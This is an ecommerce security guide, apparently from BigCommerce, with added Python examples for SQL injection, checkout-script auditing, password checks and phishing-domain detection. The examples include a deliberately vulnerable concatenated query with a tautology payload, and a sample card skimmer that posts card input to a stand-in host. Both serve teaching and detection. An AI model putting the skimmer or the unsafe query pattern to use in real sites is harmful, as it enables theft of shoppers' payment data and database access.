Before the rise in popularity of online shopping, the greatest retail cyber threats were focused on brick-and-mortar stores — particularly, breaches of point-of-sale (POS) systems to pilfer shoppers’ credit card information.
This is exactly what happened to Target, which discovered in late 2013 that attackers had planted memory-scraping malware on its POS terminals and stolen data for roughly 40 million payment cards, along with personal information for up to 70 million customers.
While attacks on major retailers, financial institutions, and large enterprises get a lot of attention, they’re not the only targets, and it’s not just brick-and-mortar POS systems being targeted. The payday for criminals stealing information from ecommerce sites is on the rise, putting even mid-sized online stores at risk.
What is ecommerce security?
The frequency and sophistication of cyber attacks has skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
Let’s look at some terminology and common acronyms you should know:
Payment Card Industry Data Security Standard (PCI DSS)
PCI DSS (often referred to as just “PCI”) is an industry standard that sets out how cardholder data must be protected by any organisation that stores, processes, or transmits it, whether the card is entered online or swiped in a store.
International Organization for Standardization (ISO)
ISO is an international standard-setting body whose standards guide businesses in making sure their products and processes are fit for purpose. One of their standards, ISO/IEC 27001:2013, specifies the requirements for an information security management system (ISMS): how an organisation identifies its information security risks, chooses controls to treat them, and keeps checking that those controls work. Achieving this certification means an accredited auditor has confirmed that such a system is in place and operating; it does not mean any particular product or website has been tested and found secure.
Personal data
Personal data or personal information refers to any data that can be linked back to a specific individual. Most simply, this includes names, email addresses, and phone numbers, but it can get more complex. Any data set, even one scrubbed of names or numbers, from which a particular person can still be identified is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS
TLS is the protocol that encrypts traffic between a shopper’s browser and your server and lets the browser verify that it is talking to the genuine site. SSL is its deprecated predecessor; people still say “SSL certificate” for the certificate a TLS-enabled site presents. Once you have a certificate for your ecommerce site, you can move from HTTP to HTTPS, which protects logins and card details from being read or altered in transit and shows shoppers the browser’s padlock. Note what it does not do: HTTPS says nothing about how securely the site itself is written, configured, or run.
Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV)
MFA, 2FA, and 2SV are sometimes used interchangeably, and they are similar, but there are differences among them. All three require a user logging in to a site, like your ecommerce store, to prove their identity with something beyond a username and password. Authentication factors fall into three groups: something you know (a password or PIN), something you have (a phone, an authenticator app, or a hardware key), and something you are (a fingerprint or face).
Here’s a high-level explanation of the differences:
- 2SV requires two steps, which may draw on the same factor: typically a password plus a one-time code delivered via email, text message, or phone call.
- 2FA requires two different factors, such as a password plus acknowledging the login attempt in an authenticator app on a mobile device while logging in from a laptop.
- MFA is the general term and can refer to the use of two or more factors.
Codes sent by SMS or email are the weakest option, because they can be intercepted through SIM swapping or phished along with the password. Authenticator apps are stronger, and hardware security keys (FIDO2/WebAuthn) are phishing-resistant, which makes them the right choice for store administrator accounts.
Distributed Denial of Service (DDoS)
A DDoS attack disrupts a server, service, or network by overwhelming it with a flood of traffic, usually sent from many compromised machines at once (a botnet). This resource on Cloudflare, which offers more detailed information on DDoS attacks, compares it to a traffic jam. Imagine trying to pull out into a major roadway during rush hour: the cars already clogging the road are the attack traffic, and your customers and legitimate visitors are the ones who can’t get in to your store.
Malware and ransomware
Malware, or “malicious software,” is software that attackers get installed on your system, usually by tricking a user into running it or by exploiting an unpatched flaw. Ransomware is a type of malware that locks the victim out of their system, or encrypts their data, until a ransom is paid to the attacker. Here are a few symptoms you may experience on a workstation if it becomes infected (on a server the signs are quieter: unfamiliar processes or scheduled tasks, unexpected outbound connections, files that have changed without a deployment):
- Links take you to the wrong page destination.
- New toolbars or buttons appear in your browser, or new icons show up on your desktop.
- You experience a near-constant barrage of ad pop-ups.
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive.
- Your emails keep bouncing.
Why cybersecurity is critical for your business
Ecommerce websites hold a lot of data about their customers — and that makes business owners a target. According to a 2018–19 Global Information Security Survey from EY, customer information is the number one most valuable data category for attackers. Coming in at number five is customer passwords.
Here are some of the reasons it’s so important to have a cyber-secure environment:
Compliance is the ground level of your commitment. Your ecommerce business is required to meet certain standards to be considered “in compliance,” and fines can be levied against you and/or your business if you do not. More on this below.
If breached, you’ll have a whole host of other problems to address that will impact your bottom line. You may have to pay for a forensic investigation, data recovery services, credit monitoring for impacted parties, and more. (Some businesses turn to cyber liability insurance to help mitigate this financial risk.)
Customers put a lot of trust in the merchants they shop with, providing personal data and sensitive payment information with every purchase. Earning customers’ trust is critical to a continued relationship, and earning it back once you’ve lost it is really, really hard — that’s why it can have a big impact on customer loyalty and retention. 64% of consumers say they are unlikely to do business again with a company from which their personal data was stolen.
What is compliance, and how is it different from security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related. But there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. But meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. (Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.)
Payment Card Industry Data Security Standard (PCI-DSS)
Any business that accepts credit card transactions must comply with the PCI-DSS requirements around protection of cardholder data, no matter their revenue or credit card transaction volumes. These data security standards are defined by the PCI Security Standards Council (PCI SSC) and enforced by the card brands through acquiring banks and payment processors. How much of the standard applies to you depends on how much card data touches your systems: a store that hands the card entry off to a hosted, tokenised payment page has far less in scope than one that collects and stores card numbers itself.
General Data Protection Regulation (GDPR)
GDPR is a European Union law, in force since May 2018, that protects the personal data and privacy of people in the EU and the wider European Economic Area (EEA), regardless of their citizenship. And it doesn’t just apply to businesses in the EU. If you sell products to people in those countries, you will need to comply with GDPR as you handle any of their data.
The biggest security threats to your ecommerce site
The types and methods of cyber attack are broad and varied, and it would be almost impossible to delve into them all in one article. But there are some that rise to the top as the most important to know about for strong ecommerce security.
Phishing
Phishing is a type of social engineering, and refers to methods used by attackers to trick victims, typically via email, text, or phone, into providing private information like passwords, account numbers, social security numbers, and more.
Malware and ransomware
When your device or network becomes infected with malware or ransomware (a type of malware), you may be locked out of all your important data and systems. Downtime is expensive, but regular, tested backups of your site data, kept separate from the systems they protect so the same infection cannot reach them, can help keep this from being a devastating blow to your business. And by not clicking on suspicious links or installing unknown software on a computer, you can be better protected against attacks.
SQL injection
Your ecommerce site is at risk if it builds database queries by pasting user input straight into the SQL text. If a search term, login field, or URL parameter is not bound as a parameter, an attacker can supply input that changes the meaning of the query and read, modify, or delete anything the application’s database account can reach, including customer records and stored payment details.
Cross-site scripting (XSS)
XSS is an injection flaw in which an attacker gets script of their own to run in shoppers’ browsers in the context of your site, typically by storing it in content the site later displays without escaping (a product review, a profile name) or by reflecting it back from a URL parameter. Because the script runs on your origin, it can read the page, act as the logged-in user, and send whatever it collects to the attacker.
E-skimming
E-skimming refers to a method of stealing credit card information and personal data from the payment pages of ecommerce sites. Attackers gain access to your site, or to a script your site loads, via a successful phishing attempt, brute force attack, XSS, or third-party compromise, then capture in real time the payment information your shoppers enter into the checkout page.
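The following is an added example, not code from the original article or from BigCommerce, showing the defect described above beside its fix. Both functions look up a customer by email in a small constructed SQLite table; the first concatenates the input into the statement, the second binds it as a parameter. A tautology payload makes the difference visible: the vulnerable lookup returns every row, the safe one returns nothing because no customer has that literal string as an email. The table, rows and payload are all constructed for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed in-memory customer table for this demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (email, card_last4) VALUES (?, ?)",
        [("alice@example.com", "4242"), ("bob@example.com", "1881")],
    )
    return conn


def lookup_vulnerable(conn, email):
    """Builds the statement by string concatenation, so whatever the shopper typed
    becomes part of the SQL itself. Deliberately unsafe: this is the 'before' picture."""
    sql = "SELECT email, card_last4 FROM customers WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, email):
    """Binds the input as a parameter. The database receives the statement and the
    value separately, so quotes or keywords in the input can never alter the query."""
    return conn.execute(
        "SELECT email, card_last4 FROM customers WHERE email = ?", (email,)
    ).fetchall()


# A classic tautology payload: the WHERE clause becomes   email = '' OR '1'='1'
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # every row comes back
    print("safe:      ", lookup_safe(db, PAYLOAD))        # no row has that literal email
```

Parameter binding is the fix; input “validation” alone is not, because a legitimate value (an email with an apostrophe, a product name containing a quote) must still be allowed through.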
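Because an e-skimmer has to get its code onto the checkout page, one practical detection is to compare the scripts a checkout page actually contains against what you expect. The added example below (not code from the original article or from BigCommerce) parses a constructed checkout page and reports three things: external scripts from hosts that are not on your allowlist, allowed third-party scripts loaded without a Subresource Integrity `integrity` attribute (so a compromised CDN could serve altered code unnoticed), and inline scripts whose hash is not in a baseline you recorded when the page was known-good. The hostnames, the `sha384-ABCDEF` placeholder and the sample HTML are all constructed; relative `src` paths are assumed to be first-party.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects every <script> element: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._attrs = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs = dict(attrs)
            self._buf = []

    def handle_data(self, data):
        if self._attrs is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            self.scripts.append({
                "src": self._attrs.get("src"),
                "integrity": self._attrs.get("integrity"),
                "inline": "".join(self._buf).strip(),
            })
            self._attrs = None


def audit_scripts(html, allowed_hosts, baseline_inline_hashes):
    """Return a list of findings; an empty list means the page matches expectations."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or ""   # "" for relative paths, assumed first-party
            if host and host not in allowed_hosts:
                findings.append(f"unexpected script host: {host}")
            elif host and not s["integrity"]:
                findings.append(f"third-party script without integrity attribute: {s['src']}")
        else:
            digest = hashlib.sha256(s["inline"].encode()).hexdigest()
            if digest not in baseline_inline_hashes:
                findings.append(f"inline script not in baseline (sha256 {digest[:12]}...)")
    return findings


# Constructed expectations: the third-party hosts you deliberately load, and the hash of the
# one inline snippet that belongs on the checkout page.
KNOWN_GOOD_INLINE = "window.dataLayer = window.dataLayer || [];"
BASELINE_INLINE_HASHES = {hashlib.sha256(KNOWN_GOOD_INLINE.encode()).hexdigest()}
ALLOWED_HOSTS = {"cdn.example-psp.com", "cdn.analytics-example.net"}

# Constructed checkout page: one first-party script, one pinned PSP SDK, one allowed script without
# SRI, one script from an unknown host, the known inline snippet, and an injected inline skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-psp.com/sdk.js" integrity="sha384-ABCDEF" crossorigin="anonymous"></script>
<script src="https://cdn.analytics-example.net/t.js"></script>
<script src="https://static.not-on-allowlist.example/x.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>document.getElementById('card').addEventListener('change',e=>fetch('https://static.not-on-allowlist.example/c',{method:'POST',body:e.target.value}));</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, BASELINE_INLINE_HASHES):
        print(finding)
```

Run this against the rendered checkout page on a schedule (or in a browser-driven test) and alert on any finding. It only sees `<script>` elements, so pair it with a Content Security Policy that restricts which hosts may run script and with SRI on every third-party script you keep; together those make the injection itself fail rather than merely being noticed afterwards.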
Best practices for ecommerce security
The compliance standards mentioned above aren’t going away. In fact, trends in privacy concerns indicate that we should expect more regulations in the future as citizens across the world become more savvy about data and personal privacy.
Verizon’s Data Breach Investigations Report dives deeper into trends in retail cyber attacks. Payment information is shown to be the prominent target, and ecommerce attacks continue to rise as point-of-sale breaches and card skimmers are, overall, declining.
If a security breach of your ecommerce site leads to a loss of customer data, the associated fines — and hit to your brand reputation — could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too
More than 80% of hacking-related breaches have been attributed to weak or stolen passwords. It’s worth the extra effort to make sure you, your employees, and your customers implement good practices for strong passwords:
- Strong passwords are long (eight characters is a floor, not a target) and do not appear on lists of passwords exposed in previous breaches. Mixing upper and lowercase letters, numbers, and symbols helps, but length matters more than variety.
- Passwords should never be shared — each user should have his or her own unique, private username and password for login.
- Never use the same password for other login credentials as you use for your ecommerce site.
- Consider using a password manager.
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions.
“Do not use any form of the default admin name provided. Attackers write scripts that run day and night trying over and over to log in to the admin panel, if you’ve used anything similar to “admin”, they are more likely to crack it.” - Jason Simmons, CEO, Dead Soxy
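Here is an added example (not code from the original article or from BigCommerce) of the two pieces of password handling a store needs on its own side: rejecting weak choices at sign-up, and storing what is accepted so that a leaked database does not hand attackers the passwords. The check enforces a minimum length, refuses passwords that contain the username, and looks the password up against a breached-password corpus using the k-anonymity pattern (only the first five hex characters of the SHA-1 are sent to the lookup, never the full hash). The corpus here is a five-entry constructed stand-in for a real one such as Pwned Passwords, `range_lookup` is a local stand-in for the range query that service offers, and the 12-character minimum is this example’s own policy, stricter than the eight-character floor above. Storage uses scrypt with a random salt per password.

```python
import hashlib
import hmac
import os

MIN_LENGTH = 12   # assumed policy for this example

# Constructed stand-in for a breached-password corpus (real ones hold hundreds of millions of hashes).
_BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("password", "123456", "qwerty123", "letmein", "Summer2023!")
}


def range_lookup(prefix5: str) -> list:
    """Stand-in for a k-anonymity range query: given the first five hex characters of a SHA-1,
    return the suffixes of every breached hash that shares that prefix. The caller matches the
    rest locally, so the full hash of the candidate password never leaves your system."""
    return [h[5:] for h in _BREACHED_SHA1 if h.startswith(prefix5)]


def is_breached(password: str) -> bool:
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[5:] in range_lookup(digest[:5])


def check_password(password: str, username: str) -> list:
    """Return the list of reasons a password is unacceptable; an empty list means it passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    if is_breached(password):
        problems.append("appears in a breached-password list")
    return problems


def hash_password(password: str) -> str:
    """scrypt with a fresh 16-byte salt; parameters are recorded so they can be raised later."""
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    return "scrypt$16384$8$1$" + salt.hex() + "$" + key.hex()


def verify_password(stored: str, password: str) -> bool:
    _, n, r, p, salt_hex, key_hex = stored.split("$")
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(key, bytes.fromhex(key_hex))   # constant-time comparison


if __name__ == "__main__":
    print(check_password("password", "alice"))            # several problems
    print(check_password("purple-tractor-kettle-47", "alice"))   # []
    record = hash_password("purple-tractor-kettle-47")
    print(verify_password(record, "purple-tractor-kettle-47"))  # True
```

The same breach check belongs on the administrator login too, since that is the account the scripted guessing in the quote above is aimed at, and a store-side lockout or rate limit on failed logins is what actually stops those scripts.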
Protect your devices
Whether you’ve got one computer in a home office or a headquarters with a full networked computer system, make sure your connected devices are cyber secure with anti-virus software, firewalls, or another appropriate method of protecting against threats, and keep their operating systems and browsers patched.
Steel yourself against social engineering attempts
One of the best ways to avoid malware infections is to avoid falling into phishing traps. Never provide any level of personal information unless you have verified the identity of the recipient through a channel you already trust, not the contact details supplied in the message itself. Additionally, no legitimate organisation will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. And do not download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender.
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., BigCommerce.com could become BgCommerce.com).
- The same goes for any URLs you might click. At first glance they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway to a dangerous domain.
- Suspicious emails may ask you to do something like transfer money or authorize a charge, and offer an excuse for why it must be done immediately.
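The “off by one letter” domain trick in the list above can be checked by a machine rather than by eye. The added example below (not code from the original article or from BigCommerce) extracts the sender domain from a `From:` header value, then classifies it against a small constructed allowlist of brands the business deals with: an exact match or subdomain is known, a brand name buried inside a longer attacker-owned name (`paypal.com-login.net`) is flagged, and anything within a small edit distance after folding common look-alike characters (`0` for `o`, `rn` for `m`) is reported as a lookalike. The domains in `KNOWN_DOMAINS`, the edit-distance threshold of 2 and the homoglyph table are all assumptions for the demonstration.

```python
KNOWN_DOMAINS = ("bigcommerce.com", "paypal.com", "shopify.com")   # constructed allowlist

# Character sequences attackers substitute because they look alike; applied to both sides
# before comparing, so a legitimate "rn" in a name is folded consistently and does no harm.
_HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def fold(domain: str) -> str:
    d = domain.lower()
    for lookalike, real in _HOMOGLYPHS:
        d = d.replace(lookalike, real)
    return d


def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character insertions, deletions or substitutions to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(from_header: str) -> str:
    """Pull the domain out of 'Display Name <user@host>' or a bare 'user@host'."""
    addr = from_header.strip()
    if addr.endswith(">") and "<" in addr:
        addr = addr[addr.rfind("<") + 1:-1]
    return addr.rpartition("@")[2].strip().lower()


def classify_domain(domain: str, known=KNOWN_DOMAINS, max_distance: int = 2) -> str:
    domain = domain.lower()
    for k in known:
        if domain == k or domain.endswith("." + k):
            return "known"
    for k in known:
        if k in domain:                       # e.g. paypal.com-login.net
            return f"embeds {k}"
        if levenshtein(fold(domain), fold(k)) <= max_distance:
            return f"lookalike of {k}"
    return "unknown"


if __name__ == "__main__":
    for header in ("Billing <support@BgCommerce.com>",
                   "alerts@mail.bigcommerce.com",
                   "Security <no-reply@paypal.com-login.net>",
                   "help@bigc0mmerce.com"):
        d = sender_domain(header)
        print(f"{d:28} -> {classify_domain(d)}")
```

The display name and the `From:` header are both attacker-controlled, so this is a triage aid for the mailbox rule or the person reading the mail, not proof of legitimacy: a sender that passes should still be held to the other checks above, and authentication of the sending domain (SPF, DKIM, DMARC) is done by the mail server rather than by a string comparison.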
Implement additional authentication factors
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you further assurance that you and your authorised users are the only people logging into your store. Considering the potential consequences of a breach, it’s worth it. For the admin accounts on your store and hosting, prefer an authenticator app or a hardware security key over codes sent by SMS, and require a factor for every user, not just the owner.
Only store the customer data that you need
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. But in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business’ philosophy to balance customer experience, business convenience, and security.
“Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.” — Shane Barker, ShaneBarker.com
Make sure your site is always up to date
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform like BigCommerce, updates to your software are taken care of automatically. But with on-premises ecommerce solutions, your business is responsible for implementing any updates, bug fixes, or vulnerability patches to the software that powers your store.
“With our previous ecommerce platform, there were ongoing security updates that we had to manually install which would always “break” something else. We had to create a secondary sandbox site to test security updates prior to uploading to our live site. As you can imagine, this was not ideal.” — Billy Thompson, President, Thompson Tee
Switch to HTTPS
Serving your site over HTTPS, which requires a TLS certificate (commonly called an SSL certificate), protects everything shoppers send you in transit. It’s also a boon for your marketing department, because Google uses HTTPS as a ranking signal and Chrome labels plain HTTP pages “Not secure.” Make the switch complete: redirect every HTTP request to HTTPS, enable HSTS so browsers stop trying HTTP at all, and check that no page still loads scripts or images over HTTP, since a single such resource triggers mixed-content warnings and can be tampered with on the wire.
Back up your data
If you are breached and lose access to your data, you are going to want a backup to help you get your business back up and running as quickly as possible. Keep at least one copy somewhere the production systems cannot write to, so ransomware that reaches the store cannot also encrypt the backup, and practise restoring from it: a backup that has never been restored is an assumption, not a plan.
Regularly review all plugins and third-party integrations
Take an inventory of all the third-party solutions you’re running within your store. Make sure that you know what they are and assess your continued level of trust in that third party. If you’re no longer using them, remove that integration from your store. The idea is to allow the fewest number of parties to have access to your customers’ data, while still driving your business forward.
Double down on security this holiday season
The holiday season is, unfortunately, a time you can expect higher volumes of attempted fraud and cyber crime. Everyone is really busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behaviour more difficult to detect. Attackers know this, and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
Do a pre-holiday security check
“The holiday season is the time when a good majority of ecommerce cyber-attacks take place, taking advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the holiday season starts. This should include checking for malware in point-of-sale systems and improving the security of web servers.” — Shane Barker, ShaneBarker.com
Your holiday security audit should also include an examination of who has access to what:
“Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.” — Jordan Brannon, President, Coalition Technologies
Dial up your fraud protection
A steep spike in shoppers is often accompanied by an increase in fraudulent activity.
“Another form of cyber risk and one of the biggest risks to ecommerce brands today is the chargeback scam. Attackers acquire credit card information along with credentials and go on a spending spree. The retailer gets an order and ships it not thinking twice about it. Only to receive a chargeback at some point in the future because the charge was marked as fraud. The retailer can’t argue and is forced to refund the order and the goods are long gone. This is even compounded more with loyalty programs and gift cards.
This type of cyber fraud is very hard to prevent. After losing 1000s in merchandise we started using the Eye4fraud.com app for BigCommerce. The app tells us in real time if each order should be shipped or not and offers a guarantee for any chargeback.” — Jason Simmons, CEO, Dead Soxy
Prepare your customer service team
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
Have a security update plan
It’s good advice to get your store pretty much locked down for the holidays and not make too many changes to it, just to avoid the extra risk that can entail. But that general guideline does not apply when it comes to security and patching your site for any vulnerabilities. This is mostly applicable if you have an on-premises ecommerce solution. You need a tried and true plan for site updates if they become necessary to ensure the security of your business and your shoppers: who decides, where the patch is tested first, and how you roll back if it breaks checkout.
Cybersecurity is a 24/7/365 endeavor that encompasses people, processes, and technologies.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.
This material does not constitute legal, tax, professional or financial advice and BigCommerce disclaims any liability with respect to this material. Please consult your attorney or professional advisor on specific legal, professional or financial matters.